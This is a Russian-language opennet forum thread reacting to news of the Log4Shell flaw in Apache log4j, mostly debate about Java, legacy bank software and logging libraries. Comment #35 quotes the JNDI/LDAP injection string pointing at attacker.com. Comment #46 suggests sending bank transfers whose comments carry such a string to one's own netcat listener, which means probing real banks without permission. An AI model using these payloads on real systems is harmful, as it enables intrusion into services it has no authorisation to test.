![]() |
Пред. тема | След. тема | ||
Форум Разговоры, обсуждение новостей | |||
---|---|---|---|
Изначальное сообщение | [ Отслеживать ] |
"Катастрофическая уязвимость в Apache log4j, затрагивающая многие Java-проекты" | +/– | ![]() |
Сообщение от opennews (??), 10-Дек-21, 09:23 | ||
В Apache log4j, популярном фреймворке для организации ведения логов в Java-приложениях,... | ||
Ответить | Правка | Cообщить модератору |
Оглавление |
Сообщения | [Сортировка по ответам | RSS] |
1.
Сообщение от Аноним![]() | –11 +/– | ![]() |
«катастрофическая», лол | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #4, #20, #46 |
2. Сообщение от Антонио (??), 10-Дек-21, 09:28 | +13 +/– | ![]() |
Переполнение буфера, говорили они. Безопасность, говорили они. Позор и срамота. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #9, #92 |
3. Сообщение от Аноним (3), 10-Дек-21, 09:30 | –6 +/– | ![]() |
ага, спасибо. прямо вот только что проснулся и побежал патчить свои Apple iCloud - сервера | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
4. Сообщение от Аноним (4), 10-Дек-21, 09:30 | +28 +/– | ![]() |
Ну учитывая где используется Java и как там дела с обновлениями, то действительно все печально | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 |
8. Сообщение от лютый жабби__ (?), 10-Дек-21, 09:43 | –3 +/– | ![]() |
бред какой-то... даже если торчит майнкрафт голой ж в инет, ну запишите в логгер произвольный текст, я посмотрю на ваши успехи ) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #10, #27 |
9. Сообщение от btrfs (?), 10-Дек-21, 09:43 | +6 +/– | ![]() |
Простите за моё невежество, но как связаны реализация в языке и нечто криво реализованное на этом языке? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #2 Ответы: #11, #69 |
10. Сообщение от Аноним (4), 10-Дек-21, 09:45 | +/– | ![]() |
А то что почти все банки на Java? При чем там лютый legacy | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #8 Ответы: #19, #34, #91 |
11. Сообщение от Аноним (11), 10-Дек-21, 09:49 | +30 +/– | ![]() |
Есть свидетели того, которые утверждают, что если убрать риски работы с памятью, то всё само наладится, и даже кости выпрямятся. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #9 Ответы: #39, #43 |
13. Сообщение от пох. (?), 10-Дек-21, 09:51 | +/– | ![]() |
Но как же ж так? Ведь жаба же ж - безопастная?! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #18, #32, #36, #45 |
16. Сообщение от d (??), 10-Дек-21, 10:00 | +3 +/– | ![]() |
Давайте все усложним, что бы потом все упростить сложными путями. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #74, #133 |
17. Сообщение от Аноним12345 (?), 10-Дек-21, 10:00 | +1 +/– | ![]() |
>> Возвращённый сервером атакующего путь будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #125 |
18. Сообщение от Аноним12345 (?), 10-Дек-21, 10:01 | +1 +/– | ![]() |
Ни разу не безопасная | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #13 Ответы: #42 |
19. Сообщение от лютый жабби__ (?), 10-Дек-21, 10:04 | +/– | ![]() |
>При чем там лютый legacy | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #10 Ответы: #37 |
20. Сообщение от Аноним (20), 10-Дек-21, 10:06 | +6 +/– | ![]() |
Не так давно пол-США сидели без бензина и мяса когда ломанули оператора трубопроводной сети и оператора сети мясокомбинатов. А на яве написано допупа бизнес-логики. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 |
21. Сообщение от Аноним (21), 10-Дек-21, 10:09 | –1 +/– | ![]() |
Да весь код на яве такой дырявый. Чтобы передать стрингу или простейший boolean сразу используют RPC с уродским RMI | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #126 |
22. Сообщение от BratishkaErik (ok), 10-Дек-21, 10:09 | +2 +/– | ![]() |
Ох, я не успел сделать новость... А вообще это круто — пусть люди поскорее узнают новость | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
24. Сообщение от Аноним (24), 10-Дек-21, 10:11 | +4 +/– | ![]() |
Jndi для лога это точно нужная фича которая должна быть включена у всех по умолчанию? Может быть нафиг её? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #44 |
27. Сообщение от BratishkaErik (ok), 10-Дек-21, 10:29 | +4 +/– | ![]() |
Написал в чате > записало в логи > взлом | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #8 Ответы: #116 |
28. Сообщение от Аноним (28), 10-Дек-21, 10:29 | –1 +/– | ![]() |
log4net в безопасности? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
29. Сообщение от пох. (?), 10-Дек-21, 10:31 | +2 +/– | ![]() |
Кстати,поищите у себя в логах appdynamics. Эксплуатируемо или нет - не знаю, но им пользуется половина так называемого цивилизованного мира. Да, оно работает от рута. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
30. Сообщение от Аноним (30), 10-Дек-21, 10:31 | +/– | ![]() |
У меня вчера stream play на стиме сам без особой причины запустился. И начал двигать мышью и открыл виртуальную клаву Steam. у меня есть основания полагать что уже активно юзают это чудо. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
31. Сообщение от DEF (?), 10-Дек-21, 10:35 | +/– | ![]() |
Блин. Мои хелловорлды юзают log4j2. Ждем фиксов! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
32. Сообщение от Котофалк (?), 10-Дек-21, 10:35 | +1 +/– | ![]() |
Скилл написать небезопасно на каком угодно языке позволяет это преодолеть. И не только это. Тут как нельзя кстати набор поговорок про сломать сдуру, про стеклянный до обеда и иже с ними. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #13 |
34. Сообщение от йо (?), 10-Дек-21, 10:38 | +2 +/– | ![]() |
Неправда, некоторые банки ещё на COBOL, и планируют перейти на модно-молодёжную Java. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #10 |
35. Сообщение от Онаним (?), 10-Дек-21, 10:40 | +4 +/– | ![]() |
> "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
36. Сообщение от йо (?), 10-Дек-21, 10:41 | +3 +/– | ![]() |
Это не Ява, это log4j. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #13 Ответы: #38 |
37. Сообщение от Онаним (?), 10-Дек-21, 10:43 | +7 +/– | ![]() |
Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО(tm). И бампнуть там ничего не получится либо потому что все версии библиотек тоже прибиты гвоздями по сертификации, либо потому, что API сменилось 100500 лет назад тому, и говно мамонта просто развалится. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #19 Ответы: #77 |
38. Сообщение от Онаним (?), 10-Дек-21, 10:47 | +/– | ![]() |
Который к сожалению в рот тащит каждый третий проект из двух. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #36 |
39. Сообщение от Аноним (39), 10-Дек-21, 10:47 | +/– | ![]() |
Простите, но Вы звиздите. Никто из них не утверждал, что прям "всё само наладится". Исчезнут (почти) целые классы ошибок, коих большинство (70-80%), но логические ошибки в архитектуре системы или в реализации бизнес-логики никто не отменял - от прокладки зависит. Но Вы, конечно, припИшете оппонентам и поедание младенцев, хуже не будет, верно? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #11 |
40. Сообщение от Аноним (-), 10-Дек-21, 10:49 | +/– | ![]() |
По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. Лично перепроверить не решился, так как за такую проверку и посадить могут. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #47, #141, #157 |
41. Сообщение от Аноним (42), 10-Дек-21, 10:51 | –3 +/– | ![]() |
Типа безопасные языки. Надо было писать на Rust :) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #49, #50 |
42. Сообщение от Аноним (42), 10-Дек-21, 10:52 | +/– | ![]() |
Шо, и указатели можно? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #18 Ответы: #56, #66, #167 |
43. Сообщение от Онаним (?), 10-Дек-21, 10:54 | +5 +/– | ![]() |
Там даже обратный эффект, я бы сказал - понижается vulnerability awareness, со всеми вытекающими. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #11 |
44. Сообщение от Онаним (?), 10-Дек-21, 10:57 | +8 +/– | ![]() |
Бездумный eval (а это по сути своей eval) в генерируемом обычно с использованием пользовательского ввода логе - это особый уровень пох**зма, который, надо сказать, очень сложно будет переплюнуть. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #24 Ответы: #59 |
45. Сообщение от Аноним (39), 10-Дек-21, 11:01 | +1 +/– | ![]() |
Ну возьми самый безопасный язык (у тебя, как я смею предположить, основываясь на твоем творчество на опеннете, это сиплюсплюс со всякими модными (условно) "умными указателями" и правильными техниками написания кода настоящими программистами?) и напиши на нем безусловную загрузку извне любой произвольной блобятины и ее последующий запуск и потом ори - "язык небезопасный, мне вирусятину тиснул!". А если каким-то чудом язык мог бы запретить такое делать, орал бы "что за 1С мне навязывают, на этом гогне ничего нетривиального нельзя сделать!" | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #13 Ответы: #121 |
46. Сообщение от Аноним (-), 10-Дек-21, 11:10 | +1 +/– | ![]() |
Для того чтобы понять почему катастрофическая запусти у себя netcat на порту 389, отправь на карту или счёт в другом банке любой перевод с ${jndi:ldap://твой_IP/test} в комментарии и насладись сколько вего разного к тебе полезет :-) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #1 Ответы: #54, #55, #60 |
47. Сообщение от пох. (?), 10-Дек-21, 11:15 | +2 +/– | ![]() |
> По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #40 Ответы: #142 |
48. Сообщение от Аноним (48), 10-Дек-21, 11:16 | +2 +/– | ![]() |
Это не уязвимость. Это - бэкдор, подобную функциональность включать в логах. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #52, #58 |
49. Сообщение от пох. (?), 10-Дек-21, 11:16 | +3 +/– | ![]() |
> Типа безопасные языки. Надо было писать на Rust :) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #41 Ответы: #82 |
50. Сообщение от Аноним (39), 10-Дек-21, 11:26 | +1 +/– | ![]() |
Ага, язык, на котором ты напишешь систему управления атомным реактором, должен будет бить тебя по рукам, когда ты в неправильной последовательности кнопки в программе будешь нажимать. А также язык, а не математик/архитектор/программист, посредством заложенных алгоритмов, должен будет следить чтобы в космической ракете ориентация правильно вычислялась. Ну и язык конечно же, а не проектировщик системы при создании, должен следить, чтобы в будущем "умном" доильном аппарате корове сиську не оторвало. Как же вы, мелкие моськи, недалёки... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #41 Ответы: #90, #102 |
52. Сообщение от Онаним (?), 10-Дек-21, 11:36 | +4 +/– | ![]() |
Это не уязвимость, и не бэкдор. Это макакинг. А чо. Эвал прямо в логе - круто же, смотрите как мы можем, удобно, трендово, смузи, вейп... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #48 |
54. Сообщение от Онаним (?), 10-Дек-21, 11:39 | +8 +/– | ![]() |
Главное чтобы маски-шоу из категории разного в дверь и окна не полезли. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #46 |
55. Сообщение от Онаним (?), 10-Дек-21, 11:40 | +/– | ![]() |
Поэтому лучше IP конечно не свой :) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #46 Ответы: #84 |
56. Сообщение от aa (?), 10-Дек-21, 11:43 | +3 +/– | ![]() |
учитывая что любой объект в джаве - это указатель, то в джаве указатели не просто можно , а прям необходимо. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #42 |
58. Сообщение от Онаним (?), 10-Дек-21, 11:50 | +1 +/– | ![]() |
"Фреймворк для ведения логов" - это звучит крутенько. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #48 |
59. Сообщение от aa (?), 10-Дек-21, 11:52 | +1 +/– | ![]() |
Выполнять логи - это конечно крипота та еще, но, я так понимаю, это ради производительности - если передавать уже готовое значение в логи, то его надо обязательно вычислить перед этим (а значит обратиться к этому лдапу, что-то передать, потом распарсить ответ итд), а логгер после этого может просто выбросить это значение, потому что уровень логгирования не тот. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #44 Ответы: #93, #158 |
60. Сообщение от Аноним (60), 10-Дек-21, 11:53 | +/– | ![]() |
В банках доступ в интернет, да даже в соседний vlan закрыт. Так что ищите где-то еще. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #46 Ответы: #68 |
61. Сообщение от mos87 (ok), 10-Дек-21, 12:06 | +3 +/– | ![]() |
глобально и надёжно | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #64, #119 |
63. Сообщение от Аноним (64), 10-Дек-21, 12:11 | +/– | ![]() |
А вот если бы писали на Хаскеле... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #79 |
64. Сообщение от Аноним (64), 10-Дек-21, 12:13 | +/– | ![]() |
Надежно можно получать неофициальную информацию от кого угодно. Да там таких уязвимостей на много лет припасено. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #61 Ответы: #78 |
65. Сообщение от Аноним (65), 10-Дек-21, 12:14 | +/– | ![]() |
Говоря откровенно, Log4j уже лет 10 как не рекомендуется использовать. Есть SLF4j и logback на замену. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #67, #86, #111, #131 |
66. Сообщение от лютый жабби__ (?), 10-Дек-21, 12:14 | +2 +/– | ![]() |
>указатели можно? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #42 Ответы: #129 |
67. Сообщение от Аноним (67), 10-Дек-21, 12:25 | +1 +/– | ![]() |
У нас в рекомендациях от архитектуры всё ровно наоброт, мол slf4j и logback уже давно мёртвые, а log4j2 ещё и лучше оптимизирован и вообще allocation-free. Хотя я когда то попал в дебри исходников log4j2 - опплевался. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #65 Ответы: #75, #88, #165 |
68. Сообщение от Аноним (68), 10-Дек-21, 12:28 | +2 +/– | ![]() |
И как вы online-банком если всё закрыто пользуйтесь? Только не говорите, что там исходящие соединения блокируются, это у единиц. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #60 Ответы: #137 |
69.
Сообщение от Michael Shigorin![]() | –3 +/– | ![]() |
> как связаны реализация в языке и нечто криво реализованное на этом языке? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #9 Ответы: #114 |
70. Сообщение от Аноним (70), 10-Дек-21, 12:34 | +1 +/– | ![]() |
там чтобы уязвимость работали макака должна пользовательскую строку не как параметр добавить а явно приконкатинировать в сообщение с масками. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #83 |
72. Сообщение от Аноним (72), 10-Дек-21, 12:36 | +1 +/– | ![]() |
Самое время задействовать умение настройки firewall. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #81, #85 |
74.
Сообщение от Michael Shigorin![]() | +/– | ![]() |
ls /! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #16 |
75. Сообщение от Аноним (65), 10-Дек-21, 12:45 | +/– | ![]() |
Если пользоваться Spring, то logback официально рекомендуемый. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #67 Ответы: #166 |
77. Сообщение от лютый жабби__ (?), 10-Дек-21, 12:59 | –3 +/– | ![]() |
>Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #37 |
78.
Сообщение от Michael Shigorin![]() | +/– | ![]() |
> Да там таких уязвимостей на много лет припасено. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #64 |
79.
Сообщение от Michael Shigorin![]() | +/– | ![]() |
...да с таким же упованием на дело рук человеческих токмо... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #63 |
80.
Сообщение от Аноним![]() | +2 +/– | ![]() |
Причём тут java впринципе? Мамкины кодеры любят использовать тонны third-party фреймворков. Да, не спорю что так код писать быстрее но если нужно надежнее - не используй 3rd party если можешь обойтись, особенно для критически уязвимой инфраструктуры. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #89, #96, #128 |
81. Сообщение от пох. (?), 10-Дек-21, 13:11 | +1 +/– | ![]() |
> Самое время задействовать умение настройки firewall. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #72 |
82. Сообщение от morphe (?), 10-Дек-21, 13:16 | +/– | ![]() |
eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #49 Ответы: #87 |
83. Сообщение от morphe (?), 10-Дек-21, 13:18 | +1 +/– | ![]() |
Неа, оно раскрывается уже после подстановки параметров в строку форматирования | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #70 |
84. Сообщение от Аноним (84), 10-Дек-21, 13:19 | +/– | ![]() |
И с чужого банковского счёта перевод делать, ага | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #55 |
85. Сообщение от morphe (?), 10-Дек-21, 13:19 | +1 +/– | ![]() |
В url можно свой порт передать, никто не заставляет сервер с ldap держать не на стандартном порту | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #72 Ответы: #104 |
86. Сообщение от morphe (?), 10-Дек-21, 13:21 | +1 +/– | ![]() |
Много где slf4j стоит с log4j бекендом, из-за того что много существующих либ работают через log4j | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #65 |
87. Сообщение от пох. (?), 10-Дек-21, 13:21 | +2 +/– | ![]() |
> eval нет, а используемые большинством библиотеки для логгирования в ldap не стучат) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #82 Ответы: #99, #164 |
88. Сообщение от ELF (ok), 10-Дек-21, 13:25 | +2 +/– | ![]() |
он log4j 1х, это да, 10 лет из танка не вылезал | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #67 Ответы: #106 |
89. Сообщение от ELF (ok), 10-Дек-21, 13:28 | +3 +/– | ![]() |
молодец, профессионала за версту видно | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #80 |
90. Сообщение от пох. (?), 10-Дек-21, 13:30 | +2 +/– | ![]() |
Конечно, язык! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #50 Ответы: #103, #143, #151 |
91. Сообщение от OramahMaalhur (ok), 10-Дек-21, 13:30 | +2 +/– | ![]() |
log4j2 != log4j | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #10 |
92. Сообщение от Аноним (84), 10-Дек-21, 13:31 | +10 +/– | ![]() |
Раньше надо было срывать стек, писать шелл-код на ассемблере, не ошибиться с адресами на удалённой машине. А теперь процесс-жертва услужливо подтянет Java байт-код атакующего прямо из Интернета и аккуратно вставит в себя, не нарушив целостность стека и процесса, автоматически проинициализирует твой код, будет за ним мусор собирать. Красота! :) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #2 Ответы: #115, #118, #120, #171 |
93. Сообщение от OramahMaalhur (ok), 10-Дек-21, 13:35 | +/– | ![]() |
>а логгер после этого может просто выбросить это значение, потому что уровень логгирования не тот | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #59 Ответы: #146 |
94. Сообщение от Аноним (94), 10-Дек-21, 13:41 | +/– | ![]() |
Вполне ожидаемо от апача и жавы. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
96. Сообщение от OramahMaalhur (ok), 10-Дек-21, 14:11 | +4 +/– | ![]() |
А вы таки переизобретаете логгер для критически уязвимой инфраструктуры каждого своего хелловолда? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #80 Ответы: #127 |
99. Сообщение от morphe (?), 10-Дек-21, 14:41 | +2 +/– | ![]() |
А в Rust даже нет смысла подобное делать | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #87 Ответы: #101, #108 |
101. Сообщение от пох. (?), 10-Дек-21, 15:09 | +/– | ![]() |
весь прикол в том что оно вовсе не "userid" получало. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #99 Ответы: #155 |
102. Сообщение от Аноним (42), 10-Дек-21, 15:10 | +/– | ![]() |
Успагойся, то был просто растотроллинг. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #50 Ответы: #107 |
103. Сообщение от Аноним (39), 10-Дек-21, 15:12 | +/– | ![]() |
> Конечно, язык! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #90 Ответы: #105 |
104. Сообщение от пох. (?), 10-Дек-21, 15:13 | –1 +/– | ![]() |
> В url можно свой порт передать, никто не заставляет сервер с ldap | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #85 |
105. Сообщение от пох. (?), 10-Дек-21, 15:16 | –2 +/– | ![]() |
>> Конечно, язык! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #103 Ответы: #149, #150 |
106. Сообщение от пох. (?), 10-Дек-21, 15:16 | +/– | ![]() |
> он log4j 1х, это да, 10 лет из танка не вылезал | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #88 Ответы: #113 |
107. Сообщение от Аноним (39), 10-Дек-21, 15:17 | +1 +/– | ![]() |
> Успагойся, то был просто растотроллинг. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #102 |
108. Сообщение от Аноним (108), 10-Дек-21, 15:29 | +1 +/– | ![]() |
Так и на яве можно сделать то же самое. И вообще как уже сказали суть уязвимости не в этом. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #99 |
109.
Сообщение от IdeaFix![]() | +2 +/– | ![]() |
У бизнеса лог4ж-1.2 массово... все эти новые технологии в бизнес не придут еще 100 лет. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
111. Сообщение от Ololo (?), 10-Дек-21, 16:23 | +1 +/– | ![]() |
Slf4j - по сути фасад, который можно навесить над разными логерами, в т.ч. log4j | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #65 |
113. Сообщение от ELF (ok), 10-Дек-21, 16:38 | +1 +/– | ![]() |
речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а первую не рекомендуют использовать уж 10 лет, кстати новость была - Катастрофическая уязвимость в Apache log4j, из нее как-будто это про log4j 1.х , теперь желтуху убрали и с версией определились. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #106 Ответы: #145 |
114. Сообщение от ыы (?), 10-Дек-21, 16:40 | –1 +/– | ![]() |
Любите вы Миша обобщать, и делать выводы космического масштаба.. а сами все лето в свитере проходили... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #69 Ответы: #123 |
115. Сообщение от ыы (?), 10-Дек-21, 16:42 | +/– | ![]() |
О дивный новый мир! | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #92 |
116. Сообщение от ыы (?), 10-Дек-21, 16:44 | +1 +/– | ![]() |
>Написал в чате > записало в логи > взлом | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #27 |
118. Сообщение от Онаним (?), 10-Дек-21, 16:55 | +2 +/– | ![]() |
Можно даже от смузи не отрываться, да, я тоже оценил. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #92 |
119. Сообщение от Онаним (?), 10-Дек-21, 16:58 | +2 +/– | ![]() |
> глобально и надёжно | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #61 |
120. Сообщение от n00by (ok), 10-Дек-21, 17:13 | +/– | ![]() |
Раньше мистеры Буггерс и Хуккерс предупреждали, что все умеют компелировать сплоет, а над ними смеялись. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #92 |
121. Сообщение от n00by (ok), 10-Дек-21, 17:22 | +/– | ![]() |
> Ну возьми ... | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #45 |
122. Сообщение от n00by (ok), 10-Дек-21, 17:41 | +/– | ![]() |
Зато Eclipse после установки лагина приходится перезапускать. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
123. Сообщение от n00by (ok), 10-Дек-21, 17:47 | +/– | ![]() |
Эту пулю ещё Фредерик Брукс в 1986-м обобщил. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #114 Ответы: #124 |
124. Сообщение от Аноним (124), 10-Дек-21, 18:06 | +/– | ![]() |
Им читать некогде - видеокурсы же есть | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #123 |
125.
Сообщение от Bogdan![]() | +1 +/– | ![]() |
Она как бы опенсорс, господин. Ну и причем тут язык и платформа, если дело в либе, уже давно log4j - это легаси, то что некоторым лень уменьшит тех. долг - не проблема платформы | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #17 |
126.
Сообщение от Bogdan![]() | +/– | ![]() |
Где вы такое последний раз видели ? И звучит странно "Что бы пкередать стрингу...." - в коком это контексте ? Куда передать ? RPC - это как бы не java-вая фигня | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #21 |
127. Сообщение от Онаним (?), 10-Дек-21, 21:04 | +/– | ![]() |
Не надо переизобретать логгер. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #96 |
128. Сообщение от Онаним (?), 10-Дек-21, 21:05 | +1 +/– | ![]() |
Абсолютно да. Third party только по абсолютной необходимости, всегда *хотя бы* с визуальным аудитом, без автообновления. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #80 |
129. Сообщение от barracuda92 (ok), 10-Дек-21, 21:49 | +/– | ![]() |
у нас индусы написали автотесты в которых была статичная мапа в который все контексты валялись, все хедлесс браузеры, всё-всё в общем, при выделении 8 гб на тесты они падали с аут оф мемори)) | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #66 Ответы: #140 |
131. Сообщение от hohoho (?), 10-Дек-21, 21:55 | +/– | ![]() |
Глупость, куда твой slf4j логирует? Это интерфейс. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #65 Ответы: #139 |
132. Сообщение от hohoho (?), 10-Дек-21, 21:59 | +/– | ![]() |
В статье не упоминается что уязвимость в PatternLayout. Если вы используете другой лэйоут, например jsonовский EcsLayout, то бэкдор не работает. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
133. Сообщение от Аноним (133), 10-Дек-21, 22:32 | –1 +/– | ![]() |
Есть мнение, что для отдельно взятой задачи сложность постоянна. Вопрос лишь в том, где она сконцентирирована - в твоём коде или в сторонних компонентах. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #16 |
134.
Сообщение от Аноним![]() | +/– | ![]() |
Вспоминается та недавняя уявзимость в imagemagick. Тоже ходило в интернет куда скажут. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #136 |
135. Сообщение от Аноним (-), 10-Дек-21, 23:07 | –1 +/– | ![]() |
На жабе не пишу, но недавно приходилось прикручивать кое-какие поделки через JNI. С этого log4 плевался особенно долго. Где-то читал, что жабу ждет судьба кобола. Легаси сектор и хорошая зарплата кому уже пох и пенсия скоро. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Ответы: #138, #147 |
136. Сообщение от Аноним (136), 11-Дек-21, 03:33 | +1 +/– | ![]() |
По хорошему такого поведения без лишних телодвижений быть не должно и предупреждать тогда ни о чем не нужно. Безопасное поведение по умолчанию. В этом плане авторы log4j подложили свинью пользователям библиотеки. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #134 |
137. Сообщение от пох. (?), 11-Дек-21, 08:54 | –1 +/– | ![]() |
Да нет, дол-еов тыщи же ж. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #68 Ответы: #175 |
138. Сообщение от пох. (?), 11-Дек-21, 09:04 | –1 +/– | ![]() |
Не читай ту глупую мурзилку больше. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #135 Ответы: #156 |
139. Сообщение от Аноним (-), 11-Дек-21, 09:42 | +/– | ![]() |
> Глупость, куда твой slf4j логирует? | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #131 |
140. Сообщение от лютый жабби__ (?), 11-Дек-21, 11:49 | –1 +/– | ![]() |
>при выделении 8 гб на тесты они падали с аут оф мемори | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #129 |
141. Сообщение от Аноня (?), 11-Дек-21, 12:28 | +/– | ![]() |
Сбеги в Бриташку и оттуда проверяй. | ||
Ответить | Правка | Наверх | Cообщить модератору | ||
Родитель: #40 |
142. Сообщение от Аноня (?), 11-Дек-21, 12:34 | +1 +/– | ![]() |
> так ты американские "проверяй" | ||
